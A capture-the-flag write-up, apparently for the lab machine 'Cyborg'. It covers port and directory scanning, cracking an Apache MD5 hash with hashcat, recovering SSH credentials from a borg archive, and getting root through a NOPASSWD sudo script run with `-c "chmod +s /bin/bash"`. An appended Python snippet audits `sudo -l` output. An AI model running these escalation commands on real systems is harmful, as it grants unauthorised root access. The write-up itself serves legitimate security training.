/////JOINED Cyborg CTF/////////
———————–SCANNING Cyborg —————————-
JUST STARTED AN NMAP SCAN –
Result –:
nmap -sC -sV 10.10.76.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 15:48 IST
Nmap scan report for 10.10.76.128
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
///————///
THE NMAP SCAN HAS JUST COMPLETED AND WE FOUND 2 OPEN PORTS
1. SSH
2. HTTP
STARTED A GOBUSTER DIRECTORY SCAN –
Result –:
gobuster dir -u http://10.10.76.128 -w /usr/share/wordlists/dirb/common.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.76.128
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/27 15:49:00 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.76.128/admin/]
/etc (Status: 301) [Size: 310] [--> http://10.10.76.128/etc/]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/07/27 15:51:32 Finished
===============================================================
////———-////
The Gobuster scan has just completed and we found a useful directory: ADMIN
IN ADMIN WE FOUND SOME TAR FILES, AN ADMINS' CHAT AND SOME PASSWORDS WHICH ARE HASHED:
——————————CRACKING THE HASHES—————————–
WE FIRST HAVE TO CHECK WHICH TYPE OF HASH THIS IS, THAT’S WHY I AM USING THE HASH-IDENTIFIER TOOL, WHICH COMES PRE-INSTALLED IN KALI LINUX!!
HASH# $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
The result –: Possible Hashes:
[+] MD5(APR)
THE HASH IS MD5(APR), SO IT’S TIME TO CRACK IT WITH HASHCAT (MODE 1600):
hashcat --force -m 1600 -a 0 has /usr/share/wordlists/rockyou.txt
Result –: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.: squidward
AS YOU CAN SEE, THE PASSWORD IS squidward !! THIS PASSWORD IS POSSIBLY FOR BORG, WHICH IS USED FOR ENCRYPTION AND COMPRESSION!!
//////////————-//////////
LET’S START DOING THAT !!
borg extract /path/to/archive::music_archive
The result–: Wow I’m awful at remembering Passwords so I’ve taken my Friend’s advice and noting them down!
Alex:[email protected]
SO WE HAVE THE CREDENTIALS FOR THE SSH LOGIN!!
/———————————–GAINING THE SHELL INTO THE MACHINE———————————————————\
AS WE HAVE THE USERNAME AND PASSWORD OF THE ALEX USER, WE EASILY GOT THE USER.TXT
cat user.txt >>> flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
NOW IT’S TIME TO ESCALATE PRIVILEGES TO ROOT!!!
————————–PRIVILEGE ESCALATION Cyborg ————————-
SO, BY TYPING sudo -l:
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
SO WE CAN RUN /etc/mp3backups/backup.sh AS ROOT, SO WE JUST HAVE TO MODIFY THAT AND THEN WE CAN HAVE THE ROOT SHELL!!!
SO NOW LET’S START BY TYPING THIS COMMAND —
sudo /etc/mp3backups/backup.sh -c whoami
Result –: root
BY TYPING THIS, WE CAN HAVE ROOT ACCESS, SO LET’S DO IT WITH /bin/bash !!
sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"
bash -p
whoami
root
bash-4.3# cat /root/root.txt = flag[——–flag——]
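The defender's side of the `sudo -l` listing above, as an added example (not part of the original write-up or of the room's files): a small audit that flags rules like the `backup.sh` one, where a script runs as root with no restriction on its arguments. The function name, the severity logic and the two extra sample rules are assumptions made for illustration.

```python
import re

# Constructed sample: the `sudo -l` listing from this write-up (Defaults line
# shortened), plus two hypothetical rules added for contrast.
SAMPLE = """\
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass
User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh ""
    (root) /usr/bin/systemctl restart nginx
"""

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")
SCRIPT_EXT = (".sh", ".bash", ".py", ".pl", ".rb")


def audit_sudo_listing(text):
    """Return one finding per command granted in `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults lines and headers carry no rule
        tags = set(re.findall(r"[A-Z_]+", m.group("tags")))
        as_root = m.group("runas").split(":")[0].strip() in ("ALL", "root")
        # Commands are comma-separated; a comma inside arguments is escaped.
        for cmd in re.split(r"(?<!\\),\s*", m.group("cmds").strip()):
            path, _, args = cmd.partition(" ")
            reasons = []
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            if as_root:
                reasons.append("runs as root")
            if path == "ALL":
                reasons.append("any command allowed")
            elif not args:
                # sudoers: with no argument list ANY arguments are accepted;
                # a trailing "" is what forbids them.
                reasons.append("arguments unrestricted")
            if path.lower().endswith(SCRIPT_EXT):
                reasons.append("target is a script")
            high = as_root and ("any command allowed" in reasons or
                                {"arguments unrestricted", "target is a script"} <= set(reasons))
            findings.append({"command": cmd, "reasons": reasons, "high": high})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_listing(SAMPLE):
        print("HIGH" if f["high"] else "ok  ", f["command"], "->", ", ".join(f["reasons"]))
```

Only the first rule, the one from this machine, is rated high: the same script pinned to `""` or a fixed-argument binary no longer lets the caller hand arbitrary options to a root-run script.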
SO IT’S OVER !!!!!!
/////////////////COMPLETED THE CYBORG /////////////////////